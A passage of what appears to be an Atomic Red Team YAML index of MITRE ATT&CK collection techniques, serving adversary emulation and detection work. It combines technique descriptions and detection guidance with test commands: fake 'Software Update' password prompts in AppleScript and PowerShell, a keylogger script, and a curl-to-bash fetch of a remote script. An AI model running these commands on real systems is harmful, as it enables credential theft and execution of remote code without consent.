attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-06-30T22:50:06.087Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_is_subtechnique: false - x_mitre_version: '2.1' - x_mitre_contributors: - - Praetorian - - Milos Stojadinovic - x_mitre_data_sources: - - Azure activity logs - - AWS CloudTrail logs - - Stackdriver logs - - OAuth audit logs - - Application logs - - Authentication logs - - Data loss prevention - - Third-party application logs - x_mitre_detection: |- - As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. - - The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - Windows - - macOS - - SaaS - - AWS - - GCP - - Azure - - Office 365 - atomic_tests: [] - T1005: - technique: - created: '2017-05-31T21:30:20.537Z' - modified: '2020-05-26T19:21:25.974Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1005 - external_id: T1005 - description: | - Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. - - Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. - name: Data from Local System - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5 - x_mitre_version: '1.2' - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: Monitor processes and command-line arguments for actions - that could be taken to collect files from a system. Remote access tools with - built-in features may interact directly with the Windows API to gather data. - Data may also be acquired through Windows system management tools such as - [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) - and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_system_requirements: - - Privileges to access certain files and directories - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false - atomic_tests: [] - T1039: - technique: - id: attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Data from Network Shared Drive - description: Adversaries may search network shares on computers they have compromised - to find files of interest. Sensitive data can be collected from remote systems - via shared network drives (host shared directory, network file server, etc.) - that are accessible from the current system prior to Exfiltration. Interactive - command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) - may be used to gather information. - external_references: - - source_name: mitre-attack - external_id: T1039 - url: https://attack.mitre.org/techniques/T1039 - - external_id: CAPEC-639 - source_name: capec - url: https://capec.mitre.org/data/definitions/639.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T15:42:44.026Z' - created: '2017-05-31T21:30:41.022Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_system_requirements: - - Privileges to access network shared drive - x_mitre_detection: Monitor processes and command-line arguments for actions - that could be taken to collect files from a network share. Remote access tools - with built-in features may interact directly with the Windows API to gather - data. Data may also be acquired through Windows system management tools such - as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) - and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.2' - atomic_tests: [] - T1025: - technique: - id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Data from Removable Media - description: "Adversaries may search connected removable media on computers - they have compromised to find files of interest. Sensitive data can be collected - from any removable media (optical disk drive, USB memory, etc.) connected - to the compromised system prior to Exfiltration. Interactive command shells - may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) - may be used to gather information. \n\nSome adversaries may also use [Automated - Collection](https://attack.mitre.org/techniques/T1119) on removable media." - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1025 - external_id: T1025 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T15:44:46.584Z' - created: '2017-05-31T21:30:31.584Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_system_requirements: - - Privileges to access removable media drive and files - x_mitre_detection: Monitor processes and command-line arguments for actions - that could be taken to collect files from a system's connected removable media. - Remote access tools with built-in features may interact directly with the - Windows API to gather data. Data may also be acquired through Windows system - management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) - and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.1' - atomic_tests: [] - T1114: - technique: - id: attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Email Collection - description: 'Adversaries may target user email to collect sensitive information. - Emails may contain sensitive data, including trade secrets or personal information, - that can prove valuable to adversaries. Adversaries can collect or forward - email from mail servers or clients. ' - external_references: - - source_name: mitre-attack - external_id: T1114 - url: https://attack.mitre.org/techniques/T1114 - - description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. - Retrieved October 8, 2019. - url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/ - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T18:31:06.417Z' - created: '2017-05-31T21:31:25.454Z' - x_mitre_contributors: - - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_is_subtechnique: false - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Windows - - Office 365 - x_mitre_detection: |- - There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection. - - File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity. - - Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - - Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. - - Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level. - x_mitre_data_sources: - - Office 365 trace logs - - Mail server - - Email gateway - - Authentication logs - - File monitoring - - Process monitoring - - Process use of network - x_mitre_version: '2.1' - atomic_tests: [] - T1114.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1114.003 - url: https://attack.mitre.org/techniques/T1114/003 - - source_name: US-CERT TA18-068A 2018 - url: https://www.us-cert.gov/ncas/alerts/TA18-086A - description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted - by Cyber Actors. Retrieved October 2, 2019. - - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2 - url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/ - description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. - Retrieved October 8, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Email Forwarding Rule - description: "Adversaries may setup email forwarding rules to collect sensitive - information. Adversaries may abuse email-forwarding rules to monitor the activities - of a victim, steal information, and further gain intelligence on the victim - or the victim’s organization to use as part of further exploits or operations.(Citation: - US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create - inbox rules for various email functions, including forwarding to a different - recipient. Messages can be forwarded to internal or external recipients, and - there are no restrictions limiting the extent of this rule. Administrators - may also create forwarding rules for user accounts with the same considerations - and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) - \n\nAny user or administrator within the organization (or adversary with valid - credentials) can create rules to automatically forward all received messages - to another recipient, forward emails to different locations based on the sender, - and more." - id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T18:29:48.994Z' - created: '2020-02-19T18:54:47.103Z' - x_mitre_contributors: - - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. - - Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level. - x_mitre_data_sources: - - Process use of network - - Process monitoring - - Email gateway - - Mail server - - Office 365 trace logs - x_mitre_platforms: - - Office 365 - - Windows - atomic_tests: [] - T1056.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1056.002 - url: https://attack.mitre.org/techniques/T1056/002 - - external_id: CAPEC-659 - source_name: capec - url: https://capec.mitre.org/data/definitions/659.html - - url: https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html - description: Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits - Mackeeper. Retrieved July 3, 2017. - source_name: OSX Malware Exploits MacKeeper - - source_name: LogRhythm Do You Trust Oct 2014 - url: https://logrhythm.com/blog/do-you-trust-your-computer/ - description: Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved - December 17, 2018. - - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware - is hungry for credentials. Retrieved July 3, 2017. - source_name: OSX Keydnap malware - - source_name: Enigma Phishing for Credentials Jan 2015 - url: https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/ - description: 'Nelson, M. (2015, January 21). Phishing for Credentials: If - you want it, just ask!. Retrieved December 17, 2018.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: GUI Input Capture - description: "Adversaries may mimic common operating system GUI components to - prompt users for credentials with a seemingly legitimate prompt. When programs - are executed that need additional privileges than are present in the current - user context, it is common for the operating system to prompt the user for - proper credentials to authorize the elevated privileges for the task (ex: - [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries - may mimic this functionality to prompt users for credentials with a seemingly - legitimate prompt for a number of reasons that mimic normal usage, such as - a fake installer requiring additional access or a fake malware removal suite.(Citation: - OSX Malware Exploits MacKeeper) This type of prompt can be used to collect - credentials via various languages such as AppleScript(Citation: LogRhythm - Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: - LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials - Jan 2015). " - id: attack-pattern--a2029942-0a85-4947-b23c-ca434698171d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-03-24T20:56:14.853Z' - created: '2020-02-11T18:58:45.908Z' - x_mitre_contributors: - - Matthew Molyett, @s1air, Cisco Talos - x_mitre_data_sources: - - PowerShell logs - - User interface - - Process command-line parameters - - Process monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. - - Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - macOS - - Windows - identifier: T1056.002 - atomic_tests: - - name: AppleScript - Prompt User for Password - auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15 - description: | - Prompt User for Password (Local Phishing) - Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html - supported_platforms: - - macos - executor: - command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell - app "System Preferences" to activate'' -e ''tell app "System Preferences" - to display dialog "Software Update requires that you type your password - to apply changes." & return & return default answer "" with icon 1 with - hidden answer with title "Software Update"'' - -' - name: bash - - name: PowerShell - Prompt User for Password - auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 - description: | - Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. - - Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py - supported_platforms: - - windows - executor: - command: "# Creates GUI to prompt for password. Expect long pause before prompt - is available. \n$cred = $host.UI.PromptForCredential('Windows Security - Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using - write-warning to allow message to show on console as echo and other similar - commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning - $cred.GetNetworkCredential().Password\n" - name: powershell - T1056: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1056 - url: https://attack.mitre.org/techniques/T1056 - - external_id: CAPEC-569 - source_name: capec - url: https://capec.mitre.org/data/definitions/569.html - - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf - description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth - look into keyloggers on Windows. Retrieved April 27, 2016.' - source_name: Adventures of a Keystroke - description: Adversaries may use methods of capturing user input to obtain credentials - or collect information. During normal system usage, users often provide credentials - to various different locations, such as login pages/portals or system dialog - boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential - API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving - the user into providing input into what they believe to be a genuine service - (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)). - name: Input Capture - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-03-24T21:29:13.900Z' - created: '2017-05-31T21:30:48.323Z' - x_mitre_version: '1.1' - x_mitre_contributors: - - John Lambert, Microsoft Threat Intelligence Center - x_mitre_data_sources: - - Windows Registry - - Windows event logs - - User interface - - Process command-line parameters - - Process monitoring - - PowerShell logs - - Loaded DLLs - - Kernel drivers - - DLL monitoring - - Binary file metadata - - API monitoring - x_mitre_detection: 'Detection may vary depending on how input is captured but - may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, - `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), - monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), - and ensuring no unauthorized drivers or kernel modules that could indicate - keylogging or API hooking are present.' - x_mitre_permissions_required: - - Administrator - - SYSTEM - - root - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false - atomic_tests: [] - T1056.001: - technique: - id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 - description: |- - Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. - - Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include: - - * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data. - * Reading raw keystroke data from the hardware buffer. - * Windows Registry modifications. - * Custom drivers. - name: Keylogging - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1056.001 - url: https://attack.mitre.org/techniques/T1056/001 - - external_id: CAPEC-568 - source_name: capec - url: https://capec.mitre.org/data/definitions/568.html - - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf - description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth - look into keyloggers on Windows. Retrieved April 27, 2016.' - source_name: Adventures of a Keystroke - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-03-24T20:45:52.998Z' - created: '2020-02-11T18:58:11.791Z' - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification - to the Registry and installation of a driver, setting a hook, or polling to - intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, - and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry - and file system for such changes, monitor driver installs, and look for common - keylogging API calls. API calls alone are not an indicator of keylogging, - but may provide behavioral data that is useful when combined with other information - such as new files written to disk and unusual processes.' - x_mitre_permissions_required: - - Administrator - - root - - SYSTEM - - User - x_mitre_data_sources: - - Windows Registry - - Process monitoring - - API monitoring - identifier: T1056.001 - atomic_tests: - - name: Input Capture - auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 - description: | - Utilize PowerShell and external resource to capture keystrokes - [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) - Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) - - Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. - supported_platforms: - - windows - input_arguments: - filepath: - description: Name of the local file, include path. - type: Path - default: "$env:TEMP\\key.log" - executor: - command: | - Set-Location $PathToAtomicsFolder - .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} - cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - -' - name: powershell - elevation_required: true - T1557.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1557.001 - url: https://attack.mitre.org/techniques/T1557/001 - - url: https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution - description: Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. - Retrieved November 17, 2017. - source_name: Wikipedia LLMNR - - url: https://technet.microsoft.com/library/cc958811.aspx - description: Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November - 17, 2017. - source_name: TechNet NetBIOS - - source_name: byt3bl33d3r NTLM Relaying - url: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html - description: Salvati, M. (2017, June 2). Practical guide to NTLM Relaying - in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February - 7, 2019. - - source_name: Secure Ideas SMB Relay - url: https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html - description: Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays - Should Be On Your Mind. Retrieved February 7, 2019. - - url: https://github.com/nomex/nbnspoof - description: Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017. - source_name: GitHub NBNSpoof - - url: https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response - description: Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017. - source_name: Rapid7 LLMNR Spoofer - - url: https://github.com/SpiderLabs/Responder - description: Gaffie, L. (2016, August 25). Responder. Retrieved November 17, - 2017. - source_name: GitHub Responder - - url: https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning - description: 'Sternstein, J. (2013, November). Local Network Attacks: LLMNR - and NBT-NS Poisoning. Retrieved November 17, 2017.' - source_name: Sternsecurity LLMNR-NBTNS - - url: https://github.com/Kevin-Robertson/Conveigh - description: Robertson, K. (2016, August 28). Conveigh. Retrieved November - 17, 2017. - source_name: GitHub Conveigh - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: LLMNR/NBT-NS Poisoning and SMB Relay - description: "By responding to LLMNR/NBT-NS network traffic, adversaries may - spoof an authoritative source for name resolution to force communication with - an adversary controlled system. This activity may be used to collect or relay - authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) - and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve - as alternate methods of host identification. LLMNR is based upon the Domain - Name System (DNS) format and allows hosts on the same local link to perform - name resolution for other hosts. NBT-NS identifies systems on a local network - by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries - can spoof an authoritative source for name resolution on a victim network - by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know - the identity of the requested host, effectively poisoning the service so that - the victims will communicate with the adversary controlled system. If the - requested host belongs to a resource that requires identification/authentication, - the username and NTLMv2 hash will then be sent to the adversary controlled - system. The adversary can then collect the hash information sent over the - wire through tools that monitor the ports for traffic or through [Network - Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes - offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to - obtain the plaintext passwords. In some cases where an adversary has access - to a system that is in the authentication path between systems or when automated - scans that use credentials attempt to authenticate to an adversary controlled - system, the NTLMv2 hashes can be intercepted and relayed to access and execute - code against a target system. The relay step can happen in conjunction with - poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: - Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison - name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). - (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub - Responder)" - id: attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-31T13:54:08.239Z' - created: '2020-02-11T19:08:51.677Z' - x_mitre_contributors: - - Eric Kuehn, Secure Ideas - - Matthew Demaske, Adaptforward - x_mitre_data_sources: - - Windows event logs - - Windows Registry - - Packet capture - - Netflow/Enclave netflow - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS) - - Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy. - - Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay) - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1074.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1074.001 - url: https://attack.mitre.org/techniques/T1074/001 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Data Staging - description: Adversaries may stage collected data in a central location or directory - on the local system prior to Exfiltration. Data may be kept in separate files - or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). - Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) - and bash may be used to copy data into a staging location. - id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-05-26T19:23:54.854Z' - created: '2020-03-13T21:13:10.467Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. - - Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1074.001 - atomic_tests: - - name: Stage data from Discovery.bat - auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f - description: | - Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, - verify that the file is saved in the temp directory. - supported_platforms: - - windows - input_arguments: - output_file: - description: Location to save downloaded discovery.bat file - type: Path - default: "$env:TEMP\\discovery.bat" - executor: - command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" - -OutFile #{output_file} - -' - cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore - -' - name: powershell - - name: Stage data from Discovery.sh - auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 - description: 'Utilize curl to download discovery.sh and execute a basic information - gathering shell script - -' - supported_platforms: - - linux - - macos - input_arguments: - output_file: - description: Location to save downloaded discovery.bat file - type: Path - default: "/tmp/T1074.001_discovery.log" - executor: - command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh - | bash -s > #{output_file} - -' - name: bash - - name: Zip a Folder with PowerShell for Staging in Temp - auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a - description: | - Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip - was placed in the temp directory. - supported_platforms: - - windows - input_arguments: - output_file: - description: Location to save zipped file or folder - type: Path - default: "$env:TEMP\\Folder_to_zip.zip" - input_file: - description: Location of file or folder to zip - type: Path - default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip - executor: - command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} - -Force - -' - cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore - -' - name: powershell - T1114.001: - technique: - created: '2020-02-19T18:46:06.098Z' - modified: '2020-03-24T17:59:20.983Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - type: attack-pattern - id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004 - description: |- - Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s 